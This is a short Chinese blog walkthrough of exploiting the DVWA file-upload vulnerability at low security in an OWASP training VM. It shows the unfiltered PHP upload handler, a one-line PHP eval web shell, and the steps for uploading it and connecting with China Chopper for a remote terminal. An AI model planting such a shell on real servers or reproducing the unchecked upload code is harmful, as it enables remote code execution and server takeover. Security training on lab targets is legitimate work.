文件上传漏洞(低安全版)

一. 预备知识
在这里插入图片描述
二 准备工作:
中国菜刀
攻击机kali linux
靶机OWASP_Broken_Web_Apps_VM_1.2 (1)
下载地址:https://wiki.owasp.org/index.php/Category:OWASP_Download
打开靶机,在火狐上打开DVWA

第一节 文件上传基础漏洞(低安全版)
上传时没有对文件信息进行过滤和检测而导致文件上传漏洞。
php代码如下:

 if(isset($_POST["Upload"]))  {
    $target_path =DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path =$target_path.basename($_FILES['uploaded']['name']);
   
     if(!move_uploaded_file($_FILES['uploaded']['tmp_name'],$target_path))  {
          echo "<pre>";
          echo "Your image was not uploaded.";
          echo "<pre>";
       }else {
        echo "<pre>";
          echo  $target_path."succesfully uploaded!";
          echo "<pre>";
             }
 }

在这里插入代码片

1) 上传文件(shell1.php)
这里可以自己创建shell1.php,内容如下

<?php @eval($_POST['chopper']);?>


在这里插入图片描述

2)上传成功
在这里插入图片描述

3) 使用中国菜刀
在这里插入图片描述
获取虚拟终端权限制

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值